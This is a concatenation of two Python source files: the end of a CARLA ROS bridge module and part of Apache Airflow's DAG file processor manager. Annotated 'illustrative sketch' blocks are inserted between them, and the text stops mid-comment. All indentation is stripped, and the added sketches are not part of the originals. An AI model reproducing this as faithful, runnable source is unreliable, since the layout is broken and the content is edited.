if self.parameters['synchronous_mode_wait_for_vehicle_control_command']:
# fill list of available ego vehicles
self._expected_ego_vehicle_control_command_ids = []
with self._expected_ego_vehicle_control_command_ids_lock:
for actor_id, actor in self.actor_factory.actors.items():
if isinstance(actor, EgoVehicle):
self._expected_ego_vehicle_control_command_ids.append(
actor_id)
self.actor_factory.update_available_objects()
frame = self.carla_world.tick()
world_snapshot = self.carla_world.get_snapshot()
self.status_publisher.set_frame(frame)
self.update_clock(world_snapshot.timestamp)
self.logdebug("Tick for frame {} returned. Waiting for sensor data...".format(
frame))
self._update(frame, world_snapshot.timestamp.elapsed_seconds)
self.logdebug("Waiting for sensor data finished.")
if self.parameters['synchronous_mode_wait_for_vehicle_control_command']:
# wait for all ego vehicles to send a vehicle control command
if self._expected_ego_vehicle_control_command_ids:
if not self._all_vehicle_control_commands_received.wait(CarlaRosBridge.VEHICLE_CONTROL_TIMEOUT):
self.logwarn("Timeout ({}s) while waiting for vehicle control commands. "
"Missing command from actor ids {}".format(CarlaRosBridge.VEHICLE_CONTROL_TIMEOUT,
self._expected_ego_vehicle_control_command_ids))
self._all_vehicle_control_commands_received.clear()
def _carla_time_tick(self, carla_snapshot):
"""
Private callback registered at carla.World.on_tick()
to trigger cyclic updates.
After successful locking the update mutex
(only perform trylock to respect bridge processing time)
the clock and the children are updated.
Finally the ROS messages collected to be published are sent out.
:param carla_timestamp: the current carla time
:type carla_timestamp: carla.Timestamp
:return:
"""
if not self.shutdown.is_set():
if self.timestamp_last_run < carla_snapshot.timestamp.elapsed_seconds:
self.timestamp_last_run = carla_snapshot.timestamp.elapsed_seconds
self.update_clock(carla_snapshot.timestamp)
self.status_publisher.set_frame(carla_snapshot.frame)
self._update(carla_snapshot.frame,
carla_snapshot.timestamp.elapsed_seconds)
def _update(self, frame_id, timestamp):
"""
update all actors
:return:
"""
self.world_info.update(frame_id, timestamp)
self.actor_factory.update_actor_states(frame_id, timestamp)
def _ego_vehicle_control_applied_callback(self, ego_vehicle_id):
if not self.sync_mode or \
not self.parameters['synchronous_mode_wait_for_vehicle_control_command']:
return
with self._expected_ego_vehicle_control_command_ids_lock:
if ego_vehicle_id in self._expected_ego_vehicle_control_command_ids:
self._expected_ego_vehicle_control_command_ids.remove(
ego_vehicle_id)
else:
self.logwarn(
"Unexpected vehicle control command received from {}".format(ego_vehicle_id))
if not self._expected_ego_vehicle_control_command_ids:
self._all_vehicle_control_commands_received.set()
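# --- Illustrative sketch (not part of the original file) ---
# The expected-ids list, its lock, and the Event above form a simple barrier:
# the Event fires once every expected actor has acknowledged. The same
# pattern as a hypothetical standalone class:
from threading import Event, Lock

class AckBarrier:
    def __init__(self, expected_ids):
        self._expected = list(expected_ids)
        self._lock = Lock()
        self._all_received = Event()

    def ack(self, id_):
        with self._lock:
            if id_ in self._expected:
                self._expected.remove(id_)
            if not self._expected:
                self._all_received.set()

    def wait(self, timeout):
        return self._all_received.wait(timeout)

_barrier = AckBarrier([1, 2])
_barrier.ack(1)
_barrier.ack(2)
assert _barrier.wait(timeout=0.1)
# --- end sketch ---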
def update_clock(self, carla_timestamp):
"""
perform the update of the clock
:param carla_timestamp: the current carla time
:type carla_timestamp: carla.Timestamp
:return:
"""
if roscomp.ok():
self.ros_timestamp = roscomp.ros_timestamp(carla_timestamp.elapsed_seconds, from_sec=True)
self.clock_publisher.publish(Clock(clock=self.ros_timestamp))
def destroy(self):
"""
Function to destroy this object.
:return:
"""
self.loginfo("Shutting down...")
self.shutdown.set()
if not self.sync_mode:
if self.on_tick_id:
self.carla_world.remove_on_tick(self.on_tick_id)
self.actor_factory.thread.join()
else:
self.synchronous_mode_update_thread.join()
self.loginfo("Object update finished.")
self.debug_helper.destroy()
self.status_publisher.destroy()
self.destroy_service(self.spawn_object_service)
self.destroy_service(self.destroy_object_service)
self.destroy_subscription(self.carla_weather_subscriber)
self.carla_control_queue.put(CarlaControl.STEP_ONCE)
for uid in self._registered_actors:
self.actor_factory.destroy_actor(uid)
self.actor_factory.update_available_objects()
self.actor_factory.clear()
super(CarlaRosBridge, self).destroy()
def main(args=None):
"""
main function for carla simulator ROS bridge
maintaining the communication client and the CarlaBridge object
"""
roscomp.init("bridge", args=args)
carla_bridge = None
carla_world = None
carla_client = None
executor = None
parameters = {}
executor = roscomp.executors.MultiThreadedExecutor()
carla_bridge = CarlaRosBridge()
executor.add_node(carla_bridge)
roscomp.on_shutdown(carla_bridge.destroy)
parameters['host'] = carla_bridge.get_param('host', 'localhost')
parameters['port'] = carla_bridge.get_param('port', 2000)
parameters['timeout'] = carla_bridge.get_param('timeout', 2)
parameters['passive'] = carla_bridge.get_param('passive', False)
parameters['synchronous_mode'] = carla_bridge.get_param('synchronous_mode', True)
parameters['synchronous_mode_wait_for_vehicle_control_command'] = carla_bridge.get_param(
'synchronous_mode_wait_for_vehicle_control_command', False)
parameters['fixed_delta_seconds'] = carla_bridge.get_param('fixed_delta_seconds',
0.05)
parameters['register_all_sensors'] = carla_bridge.get_param('register_all_sensors', True)
parameters['town'] = carla_bridge.get_param('town', 'Town01')
role_name = carla_bridge.get_param('ego_vehicle_role_name',
["hero", "ego_vehicle", "hero1", "hero2", "hero3"])
parameters["ego_vehicle"] = {"role_name": role_name}
carla_bridge.loginfo("Trying to connect to {host}:{port}".format(
host=parameters['host'], port=parameters['port']))
try:
carla_client = carla.Client(
host=parameters['host'],
port=parameters['port'])
carla_client.set_timeout(parameters['timeout'])
# check carla version
# dist = pkg_resources.get_distribution("carla")
# if LooseVersion(dist.version) != LooseVersion(CarlaRosBridge.CARLA_VERSION):
# carla_bridge.logfatal("CARLA python module version {} required. Found: {}".format(
# CarlaRosBridge.CARLA_VERSION, dist.version))
# sys.exit(1)
# if LooseVersion(carla_client.get_server_version()) != \
# LooseVersion(carla_client.get_client_version()):
# carla_bridge.logwarn(
# "Version mismatch detected: You are trying to connect to a simulator that might be incompatible with this API. Client API version: {}. Simulator API version: {}"
# .format(carla_client.get_client_version(),
# carla_client.get_server_version()))
carla_world = carla_client.get_world()
if "town" in parameters and not parameters['passive']:
if parameters["town"].endswith(".xodr"):
carla_bridge.loginfo(
"Loading opendrive world from file '{}'".format(parameters["town"]))
with open(parameters["town"]) as od_file:
data = od_file.read()
carla_world = carla_client.generate_opendrive_world(str(data))
else:
if carla_world.get_map().name != parameters["town"]:
carla_bridge.loginfo("Loading town '{}' (previous: '{}').".format(
parameters["town"], carla_world.get_map().name))
carla_world = carla_client.load_world(parameters["town"])
carla_world.tick()
carla_bridge.initialize_bridge(carla_client.get_world(), parameters)
carla_bridge.spin()
except (IOError, RuntimeError) as e:
carla_bridge.logerr("Error: {}".format(e))
except KeyboardInterrupt:
pass
finally:
roscomp.shutdown()
del carla_world
del carla_client
if __name__ == "__main__":
main()
|
manager.py | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Processes DAGs."""
import enum
import importlib
import inspect
import logging
import multiprocessing
import os
import random
import signal
import sys
import time
import zipfile
from collections import defaultdict
from datetime import datetime, timedelta
from importlib import import_module
from multiprocessing.connection import Connection as MultiprocessingConnection
from typing import TYPE_CHECKING, Any, Dict, List, NamedTuple, Optional, Union, cast
from setproctitle import setproctitle
from sqlalchemy.orm import Session
from tabulate import tabulate
import airflow.models
from airflow.callbacks.callback_requests import CallbackRequest
from airflow.configuration import conf
from airflow.dag_processing.processor import DagFileProcessorProcess
from airflow.models import DagModel, DbCallbackRequest, errors
from airflow.models.serialized_dag import SerializedDagModel
from airflow.stats import Stats
from airflow.utils import timezone
from airflow.utils.file import list_py_file_paths, might_contain_dag
from airflow.utils.log.logging_mixin import LoggingMixin
from airflow.utils.mixins import MultiprocessingStartMethodMixin
from airflow.utils.net import get_hostname
from airflow.utils.process_utils import (
kill_child_processes_by_pids,
reap_process_group,
set_new_process_group,
)
from airflow.utils.session import NEW_SESSION, provide_session
from airflow.utils.sqlalchemy import prohibit_commit, skip_locked, with_row_locks
if TYPE_CHECKING:
import pathlib
class DagParsingStat(NamedTuple):
"""Information on processing progress"""
done: bool
all_files_processed: bool
class DagFileStat(NamedTuple):
"""Information about single processing of one file"""
num_dags: int
import_errors: int
last_finish_time: Optional[datetime]
last_duration: Optional[timedelta]
run_count: int
class DagParsingSignal(enum.Enum):
"""All signals sent to parser."""
AGENT_RUN_ONCE = 'agent_run_once'
TERMINATE_MANAGER = 'terminate_manager'
END_MANAGER = 'end_manager'
class DagFileProcessorAgent(LoggingMixin, MultiprocessingStartMethodMixin):
"""
Agent for DAG file processing. It is responsible for all DAG parsing
related jobs in the scheduler process. Mainly it spins up DagFileProcessorManager
in a subprocess, collects DAG parsing results from it and exchanges
signals/DAG parsing stats with it.
This class runs in the main `airflow scheduler` process.
:param dag_directory: Directory where DAG definitions are kept. All
files in file_paths should be under this directory
:param max_runs: The number of times to parse and schedule each file. -1
for unlimited.
:param processor_timeout: How long to wait before timing out a DAG file processor
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:param pickle_dags: whether to pickle DAGs.
:param async_mode: Whether to start agent in async mode
"""
def __init__(
self,
dag_directory: str,
max_runs: int,
processor_timeout: timedelta,
dag_ids: Optional[List[str]],
pickle_dags: bool,
async_mode: bool,
):
super().__init__()
self._file_path_queue: List[str] = []
self._dag_directory: str = dag_directory
self._max_runs = max_runs
self._processor_timeout = processor_timeout
self._dag_ids = dag_ids
self._pickle_dags = pickle_dags
self._async_mode = async_mode
# Map from file path to the processor
self._processors: Dict[str, DagFileProcessorProcess] = {}
# Pipe for communicating signals
self._process: Optional[multiprocessing.process.BaseProcess] = None
self._done: bool = False
# Initialized as true so we do not deactivate w/o any actual DAG parsing.
self._all_files_processed = True
self._parent_signal_conn: Optional[MultiprocessingConnection] = None
self._last_parsing_stat_received_at: float = time.monotonic()
def start(self) -> None:
"""Launch DagFileProcessorManager processor and start DAG parsing loop in manager."""
mp_start_method = self._get_multiprocessing_start_method()
context = multiprocessing.get_context(mp_start_method)
self._last_parsing_stat_received_at = time.monotonic()
self._parent_signal_conn, child_signal_conn = context.Pipe()
process = context.Process(
target=type(self)._run_processor_manager,
args=(
self._dag_directory,
self._max_runs,
self._processor_timeout,
child_signal_conn,
self._dag_ids,
self._pickle_dags,
self._async_mode,
),
)
self._process = process
process.start()
self.log.info("Launched DagFileProcessorManager with pid: %s", process.pid)
def run_single_parsing_loop(self) -> None:
"""
Should only be used when launched DAG file processor manager in sync mode.
Send agent heartbeat signal to the manager, requesting that it runs one
processing "loop".
Call wait_until_finished to ensure that any launched processors have
finished before continuing
"""
if not self._parent_signal_conn or not self._process:
raise ValueError("Process not started.")
if not self._process.is_alive():
return
try:
self._parent_signal_conn.send(DagParsingSignal.AGENT_RUN_ONCE)
except ConnectionError:
# If this died because of an error then it will be noticed and restarted
# when harvest_serialized_dags calls _heartbeat_manager.
pass
def get_callbacks_pipe(self) -> MultiprocessingConnection:
"""Returns the pipe for sending Callbacks to DagProcessorManager."""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
return self._parent_signal_conn
def wait_until_finished(self) -> None:
"""Waits until DAG parsing is finished."""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
if self._async_mode:
raise RuntimeError("wait_until_finished should only be called in sync_mode")
while self._parent_signal_conn.poll(timeout=None):
try:
result = self._parent_signal_conn.recv()
except EOFError:
return
self._process_message(result)
if isinstance(result, DagParsingStat):
# In sync mode (which is the only time we call this function) we don't send this message from
# the Manager until all the running processors have finished
return
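# --- Illustrative sketch (not part of the original file) ---
# wait_until_finished() above blocks on poll() and recv()s messages until a
# DagParsingStat arrives. The same drain-until-sentinel loop as a standalone
# helper over a multiprocessing Pipe:
import multiprocessing

def drain_until(conn, sentinel_type):
    """Receive messages from conn until one of sentinel_type arrives."""
    while conn.poll(timeout=None):
        try:
            msg = conn.recv()
        except EOFError:
            return None
        if isinstance(msg, sentinel_type):
            return msg

_parent_conn, _child_conn = multiprocessing.Pipe()
_child_conn.send("progress")
_child_conn.send(42)  # pretend int is our sentinel type here
assert drain_until(_parent_conn, int) == 42
# --- end sketch ---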
@staticmethod
def _run_processor_manager(
dag_directory: str,
max_runs: int,
processor_timeout: timedelta,
signal_conn: MultiprocessingConnection,
dag_ids: Optional[List[str]],
pickle_dags: bool,
async_mode: bool,
) -> None:
# Make this process start as a new process group - that makes it easy
# to kill all sub-processes of this one at the OS level, rather than
# having to iterate over the child processes
os.setpgid(0, 0)
setproctitle("airflow scheduler -- DagFileProcessorManager")
# Reload configurations and settings to avoid collisions with the parent process.
# This process may need custom configurations that cannot be shared,
# e.g. RotatingFileHandler, and connection corruption can occur if we
# do not recreate the SQLAlchemy connection pool.
os.environ['CONFIG_PROCESSOR_MANAGER_LOGGER'] = 'True'
os.environ['AIRFLOW__LOGGING__COLORED_CONSOLE_LOG'] = 'False'
# Replicating the behavior of how logging module was loaded
# in logging_config.py
# TODO: This reloading should be removed when we fix our logging behaviour
# In case of "spawn" method of starting processes for multiprocessing, reinitializing of the
# SQLAlchemy engine causes extremely unexpected behaviour of messing with objects already loaded
# in a parent process (likely via resources shared in memory by the ORM libraries).
# This caused flaky tests in our CI for many months and has been discovered while
# iterating on https://github.com/apache/airflow/pull/19860
# The issue that describes the problem and possible remediation is
# at https://github.com/apache/airflow/issues/19934
importlib.reload(import_module(airflow.settings.LOGGING_CLASS_PATH.rsplit('.', 1)[0])) # type: ignore
importlib.reload(airflow.settings)
airflow.settings.initialize()
del os.environ['CONFIG_PROCESSOR_MANAGER_LOGGER']
processor_manager = DagFileProcessorManager(
dag_directory=dag_directory,
max_runs=max_runs,
processor_timeout=processor_timeout,
dag_ids=dag_ids,
pickle_dags=pickle_dags,
signal_conn=signal_conn,
async_mode=async_mode,
)
processor_manager.start()
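# --- Illustrative sketch (not part of the original file) ---
# _run_processor_manager() above detaches into its own process group so that
# the whole subtree can be signalled at once. The core pattern (Unix only),
# as a hypothetical helper; manager_pid below is a placeholder name:
import os

def run_in_own_process_group():
    os.setpgid(0, 0)  # become the leader of a new process group
    # Children forked from here inherit the group, so a supervisor can later
    # terminate the entire subtree in one call, e.g.:
    #   os.killpg(os.getpgid(manager_pid), signal.SIGTERM)
# --- end sketch ---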
def heartbeat(self) -> None:
"""Check if the DagFileProcessorManager process is alive, and process any pending messages"""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
# Receive any pending messages before checking if the process has exited.
while self._parent_signal_conn.poll(timeout=0.01):
try:
result = self._parent_signal_conn.recv()
except (EOFError, ConnectionError):
break
self._process_message(result)
# If it died unexpectedly restart the manager process
self._heartbeat_manager()
def _process_message(self, message):
self.log.debug("Received message of type %s", type(message).__name__)
if isinstance(message, DagParsingStat):
self._sync_metadata(message)
else:
raise RuntimeError(f"Unexpected message received of type {type(message).__name__}")
def _heartbeat_manager(self):
"""Heartbeat DAG file processor and restart it if we are not done."""
if not self._parent_signal_conn:
raise ValueError("Process not started.")
if self._process and not self._process.is_alive():
self._process.join(timeout=0)
if not self.done:
self.log.warning(
"DagFileProcessorManager (PID=%d) exited with exit code %d - re-launching",
self._process.pid,
self._process.exitcode,
)
self.start()
if self.done:
return
parsing_stat_age = time.monotonic() - self._last_parsing_stat_received_at
if parsing_stat_age > self._processor_timeout.total_seconds():
Stats.incr('dag_processing.manager_stalls')
self.log.error(
"DagFileProcessorManager (PID=%d) last sent a heartbeat %.2f seconds ago! Restarting it",
self._process.pid,
parsing_stat_age,
)
reap_process_group(self._process.pid, logger=self.log)
self.start()
def _sync_metadata(self, stat):
"""Sync metadata from stat queue and only keep the latest stat."""
self._done = stat.done
self._all_files_processed = stat.all_files_processed
self._last_parsing_stat_received_at = time.monotonic()
@property
def done(self) -> bool:
"""Has DagFileProcessorManager ended?"""
return self._done
@property
def all_files_processed(self):
"""Have all files been processed at least once?"""
return self._all_files_processed
def terminate(self):
"""
Send termination signal to DAG parsing processor manager
and expect it to terminate all DAG file processors.
"""
if self._process and self._process.is_alive():
self.log.info("Sending termination message to manager.")
try:
self._parent_signal_conn.send(DagParsingSignal.TERMINATE_MANAGER)
except ConnectionError:
pass
def end(self):
"""
Terminate (and then kill) the manager process launched.
:return:
"""
if not self._process:
self.log.warning('Ending without manager process.')
return
# Give the Manager some time to cleanly shut down, but not too long, as
# it's better to finish sooner than wait for (non-critical) work to
# finish
self._process.join(timeout=1.0)
reap_process_group(self._process.pid, logger=self.log)
self._parent_signal_conn.close()
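# --- Illustrative sketch (not part of the original file) ---
# A hypothetical sync-mode lifecycle for the agent above (the directory and
# timeout are placeholders, not taken from any real deployment):
#
#     from datetime import timedelta
#     agent = DagFileProcessorAgent(
#         dag_directory="/files/dags", max_runs=1,
#         processor_timeout=timedelta(seconds=600),
#         dag_ids=None, pickle_dags=False, async_mode=False,
#     )
#     agent.start()
#     agent.run_single_parsing_loop()  # ask the manager for one pass
#     agent.wait_until_finished()      # block until that pass completes
#     agent.end()
# --- end sketch ---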
class DagFileProcessorManager(LoggingMixin):
"""
Given a list of DAG definition files, this kicks off several processors
in parallel to process them and put the results into a multiprocessing.Queue
for DagFileProcessorAgent to harvest. The parallelism is limited and as the
processors finish, more are launched. The files are processed over and
over again, but no more often than the specified interval.
:param dag_directory: Directory where DAG definitions are kept. All
files in file_paths should be under this directory
:param max_runs: The number of times to parse and schedule each file. -1
for unlimited.
:param processor_timeout: How long to wait before timing out a DAG file processor
:param signal_conn: connection to communicate signal with processor agent.
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:param pickle_dags: whether to pickle DAGs.
:param async_mode: whether to start the manager in async mode
"""
def __init__(
self,
dag_directory: Union[str, "pathlib.Path"],
max_runs: int,
processor_timeout: timedelta,
dag_ids: Optional[List[str]],
pickle_dags: bool,
signal_conn: Optional[MultiprocessingConnection] = None,
async_mode: bool = True,
):
super().__init__()
self._file_paths: List[str] = []
self._file_path_queue: List[str] = []
self._dag_directory = dag_directory
self._max_runs = max_runs
# signal_conn is None for dag_processor_standalone mode.
self._direct_scheduler_conn = signal_conn
self._pickle_dags = pickle_dags
self._dag_ids = dag_ids
self._async_mode = async_mode
self._parsing_start_time: Optional[int] = None
# Set the signal conn to non-blocking mode, so that attempting to
# send when the buffer is full errors, rather than hanging forever
# attempting to send (this is to avoid deadlocks!)
#
# Don't do this in sync mode, as we _need_ the DagParsingStat sent to
# continue the scheduler
if self._async_mode and self._direct_scheduler_conn is not None:
os.set_blocking(self._direct_scheduler_conn.fileno(), False)
self._parallelism = conf.getint('scheduler', 'parsing_processes')
if (
conf.get_mandatory_value('database', 'sql_alchemy_conn').startswith('sqlite')
and self._parallelism > 1
):
self.log.warning(
"Cannot use more than 1 thread (parsing_processes = "
"%d) when using SQLite; setting parallelism to 1.",
self._parallelism,
)
self._parallelism = 1
# Parse and schedule each file no faster than this interval.
self._file_process_interval = conf.getint('scheduler', 'min_file_process_interval')
# How often to print out DAG file processing stats to the log. Default to
# 30 seconds.
self.print_stats_interval = conf.getint('scheduler', 'print_stats_interval')
# Map from file path to the processor
self._processors: Dict[str, DagFileProcessorProcess] = {}
self._num_run = 0
# Map from file path to stats about the file
self._file_stats: Dict[str, DagFileStat] = {}
# Last time that the DAG dir was traversed to look for files
self.last_dag_dir_refresh_time = timezone.make_aware(datetime.fromtimestamp(0))
# Last time stats were printed
self.last_stat_print_time = 0
# Last time we cleaned up DAGs which are no longer in files
self.last_deactivate_stale_dags_time = timezone.make_aware(datetime.fromtimestamp(0))
# How often to check for DAGs which are no longer in files
self.deactivate_stale_dags_interval = conf.getint('scheduler', 'deactivate_stale_dags_interval')
# How long to wait before timing out a process to parse a DAG file
self._processor_timeout = processor_timeout
# How often to scan the DAGs directory for new files. Default to 5 minutes.
self.dag_dir_list_interval = conf.getint('scheduler', 'dag_dir_list_interval')
# Mapping file name and callbacks requests
self._callback_to_execute: Dict[str, List[CallbackRequest]] = defaultdict(list)
self._log = logging.getLogger('airflow.processor_manager')
self.waitables: Dict[Any, Union[MultiprocessingConnection, DagFileProcessorProcess]] = (
{
self._direct_scheduler_conn: self._direct_scheduler_conn,
}
if self._direct_scheduler_conn is not None
else {}
)
def register_exit_signals(self):
"""Register signals that stop child processes"""
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
# So that we ignore the debug dump signal, making it easier to send
signal.signal(signal.SIGUSR2, signal.SIG_IGN)
def _exit_gracefully(self, signum, frame):
"""Helper method to clean up DAG file processors to avoid leaving orphan processes."""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
self.log.debug("Current Stacktrace is: %s", '\n'.join(map(str, inspect.stack())))
self.terminate()
self.end()
self.log.debug("Finished terminating DAG processors.")
sys.exit(os.EX_OK)
def start(self):
"""
Use multiple processes to parse and generate tasks for the
DAGs in parallel. By processing them in separate processes,
we can get parallelism and isolation from potentially harmful
user code.
"""
self.register_exit_signals()
set_new_process_group()
self.log.info("Processing files using up to %s processes at a time ", self._parallelism)
self.log.info("Process each file at most once every %s seconds", self._file_process_interval)
self.log.info(
"Checking for new files in %s every %s seconds", self._dag_directory, self.dag_dir_list_interval
)
return self._run_parsing_loop()
@provide_session
def _deactivate_stale_dags(self, session=None):
"""
Detects DAGs which are no longer present in files,
deactivates them and removes them from the serialized_dag table
"""
now = timezone.utcnow()
elapsed_time_since_refresh = (now - self.last_deactivate_stale_dags_time).total_seconds()
if elapsed_time_since_refresh > self.deactivate_stale_dags_interval:
last_parsed = {
fp: self.get_last_finish_time(fp) for fp in self.file_paths if self.get_last_finish_time(fp)
}
to_deactivate = set()
dags_parsed = (
session.query(DagModel.dag_id, DagModel.fileloc, DagModel.last_parsed_time)
.filter(DagModel.is_active)
.all()
)
for dag in dags_parsed:
# The largest valid difference between a DagFileStat's last_finished_time and a DAG's
# last_parsed_time is _processor_timeout. Longer than that indicates that the DAG is
# no longer present in the file.
if (
dag.fileloc in last_parsed
and (dag.last_parsed_time + self._processor_timeout) < last_parsed[dag.fileloc]
):
self.log.info("DAG %s is missing and will be deactivated.", dag.dag_id)
to_deactivate.add(dag.dag_id)
if to_deactivate:
deactivated = (
session.query(DagModel)
.filter(DagModel.dag_id.in_(to_deactivate))
.update({DagModel.is_active: False}, synchronize_session="fetch")
)
if deactivated:
self.log.info("Deactivated %i DAGs which are no longer present in file.", deactivated)
for dag_id in to_deactivate:
SerializedDagModel.remove_dag(dag_id)
self.log.info("Deleted DAG %s in serialized_dag table", dag_id)
self.last_deactivate_stale_dags_time = timezone.utcnow()
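# --- Illustrative sketch (not part of the original file) ---
# The staleness test above: a DAG is considered gone from its file when the
# file finished parsing more than processor_timeout after the DAG's own
# last_parsed_time. As a standalone predicate:
from datetime import datetime, timedelta

def is_dag_stale(dag_last_parsed, file_last_finished, processor_timeout):
    return (dag_last_parsed + processor_timeout) < file_last_finished

_now = datetime(2022, 1, 1, 12, 0)
_timeout = timedelta(seconds=600)
assert is_dag_stale(_now - timedelta(hours=1), _now, _timeout)          # stale
assert not is_dag_stale(_now - timedelta(seconds=30), _now, _timeout)   # fresh
# --- end sketch ---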
def _run_parsing_loop(self):
# In sync mode we want timeout=None -- wait forever until a message is received
if self._async_mode:
poll_time = 0.0
else:
poll_time = None
self._refresh_dag_dir()
self.prepare_file_path_queue()
max_callbacks_per_loop = conf.getint("scheduler", "max_callbacks_per_loop")
standalone_dag_processor = conf.getboolean("scheduler", "standalone_dag_processor")
if self._async_mode:
# If we're in async mode, we can start up straight away. If we're
# in sync mode we need to be told to start a "loop"
self.start_new_processes()
while True:
loop_start_time = time.monotonic()
ready = multiprocessing.connection.wait(self.waitables.keys(), timeout=poll_time)
if self._direct_scheduler_conn is not None and self._direct_scheduler_conn in ready:
agent_signal = self._direct_scheduler_conn.recv()
self.log.debug("Received %s signal from DagFileProcessorAgent", agent_signal)
if agent_signal == DagParsingSignal.TERMINATE_MANAGER:
self.terminate()
break
elif agent_signal == DagParsingSignal.END_MANAGER:
self.end()
sys.exit(os.EX_OK)
elif agent_signal == DagParsingSignal.AGENT_RUN_ONCE:
# continue the loop to parse dags
pass
elif isinstance(agent_signal, CallbackRequest):
self._add_callback_to_queue(agent_signal)
else:
raise ValueError(f"Invalid message {type(agent_signal)}")
if not ready and not self._async_mode:
# In "sync" mode we don't want to parse the DAGs until we
# are told to (as that would open another connection to the
# SQLite DB which isn't a good practice
# This shouldn't happen, as in sync mode poll should block for
# ever. Lets be defensive about that.
self.log.warning(
"wait() unexpectedly returned nothing ready after infinite timeout (%r)!", poll_time
)
continue
for sentinel in ready:
if sentinel is self._direct_scheduler_conn:
continue
processor = self.waitables.get(sentinel)
if not processor:
continue
self._collect_results_from_processor(processor)
self.waitables.pop(sentinel)
self._processors.pop(processor.file_path)
if standalone_dag_processor:
self._fetch_callbacks(max_callbacks_per_loop)
self._deactivate_stale_dags()
self._refresh_dag_dir()
self._kill_timed_out_processors()
# Generate more file paths to process if we processed all the files
# already.
if not self._file_path_queue:
self.emit_metrics()
self.prepare_file_path_queue()
self.start_new_processes()
# Update number of loop iteration.
self._num_run += 1
if not self._async_mode:
self.log.debug("Waiting for processors to finish since we're using sqlite")
# Wait until the running DAG processors are finished before
# sending a DagParsingStat message back. This means the Agent
# can tell we've got to the end of this iteration when it sees
# this type of message
self.wait_until_finished()
# Collect anything else that has finished, but don't kick off any more processors
self.collect_results()
self._print_stat()
all_files_processed = all(self.get_last_finish_time(x) is not None for x in self.file_paths)
max_runs_reached = self.max_runs_reached()
try:
if self._direct_scheduler_conn:
self._direct_scheduler_conn.send(
DagParsingStat(
max_runs_reached,
all_files_processed,
)
)
except BlockingIOError:
# Try again next time around the loop!
# It is better to fail than to deadlock. This should
# "almost never happen" since the DagParsingStat object is
# small, and in async mode this stat is not actually _required_
# for normal operation (it only drives "max runs")
self.log.debug("BlockingIOError received trying to send DagParsingStat, ignoring")
if max_runs_reached:
self.log.info(
"Exiting dag parsing loop as all files have been processed %s times", self._max_runs
)
break
if self._async_mode:
loop_duration = time.monotonic() - loop_start_time
if loop_duration < 1:
poll_time = 1 - loop_duration
else:
poll_time = 0.0
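# --- Illustrative sketch (not part of the original file) ---
# The tail of _run_parsing_loop() above targets roughly one iteration per
# second in async mode: it polls only for whatever is left of the current
# second. As a standalone helper:
def next_poll_time(loop_duration, target=1.0):
    return target - loop_duration if loop_duration < target else 0.0

assert next_poll_time(0.25) == 0.75  # fast loop: sleep out the remainder
assert next_poll_time(3.0) == 0.0    # slow loop: poll again immediately
# --- end sketch ---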
@provide_session
def _fetch_callbacks(self, max_callbacks: int, session: Session = NEW_SESSION):
"""Fetches callbacks from database and add them to the internal queue for execution."""
self.log.debug("Fetching callbacks from the database.")
with prohibit_commit(session) as guard:
query = (
session.query(DbCallbackRequest)
.order_by(DbCallbackRequest.priority_weight.asc())
.limit(max_callbacks)
)
callbacks = with_row_locks(
query, of=DbCallbackRequest, session=session, **skip_locked(session=session)
).all()
for callback in callbacks:
try:
self._add_callback_to_queue(callback.get_callback_request())
session.delete(callback)
except Exception as e:
self.log.warning("Error adding callback for execution: %s, %s", callback, e)
guard.commit()
def _add_callback_to_queue(self, request: CallbackRequest):
self._callback_to_execute[request.full_filepath].append(request)
# Callback has a higher priority over DAG Run scheduling
if request.full_filepath in self._file_path_queue:
# Remove file paths matching request.full_filepath from self._file_path_queue
# Since we are already going to use that filepath to run callback,
# there is no need to have same file path again in the queue
self._file_path_queue = [
file_path for file_path in self._file_path_queue if file_path != request.full_filepath
]
self._file_path_queue.insert(0, request.full_filepath)
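# --- Illustrative sketch (not part of the original file) ---
# _add_callback_to_queue() above promotes a file path to the front of the
# queue, removing any duplicate entry first. The same move-to-front step as
# a standalone helper:
def promote_to_front(queue_list, item):
    queue_list = [x for x in queue_list if x != item]
    queue_list.insert(0, item)
    return queue_list

assert promote_to_front(["a.py", "b.py", "c.py"], "b.py") == ["b.py", "a.py", "c.py"]
# --- end sketch ---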
def _refresh_dag_dir(self):
"""Refresh file paths from dag dir if we haven't done it for too long."""
now = timezone.utcnow()
elapsed_time_since_refresh = (now - self.last_dag_dir_refresh_time).total_seconds()
if elapsed_time_since_refresh > self.dag_dir_list_interval:
# Build up a list of Python files that could contain DAGs
self.log.info("Searching for files in %s", self._dag_directory)
self._file_paths = list_py_file_paths(self._dag_directory)
self.last_dag_dir_refresh_time = now
self.log.info("There are %s files in %s", len(self._file_paths), self._dag_directory)
self.set_file_paths(self._file_paths)
try:
self.log.debug("Removing old import errors")
self.clear_nonexistent_import_errors()
except Exception:
self.log.exception("Error removing old import errors")
# Check if file path is a zipfile and get the full path of the python file.
# Without this, SerializedDagModel.remove_deleted_dags would delete zipped dags.
# Likewise DagCode.remove_deleted_code
dag_filelocs = []
for fileloc in self._file_paths:
if not fileloc.endswith(".py") and zipfile.is_zipfile(fileloc):
with zipfile.ZipFile(fileloc) as z:
dag_filelocs.extend(
[
os.path.join(fileloc, info.filename)
for info in z.infolist()
if might_contain_dag(info.filename, True, z)
]
)
else:
dag_filelocs.append(fileloc)
SerializedDagModel.remove_deleted_dags(dag_filelocs)
DagModel.deactivate_deleted_dags(self._file_paths)
from airflow.models.dagcode import DagCode
DagCode.remove_deleted_code(dag_filelocs)
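# --- Illustrative sketch (not part of the original file) ---
# Zipped DAG bundles above are tracked by member path, e.g.
# "/dags/bundle.zip/my_dag.py". A simplified standalone expansion of a file
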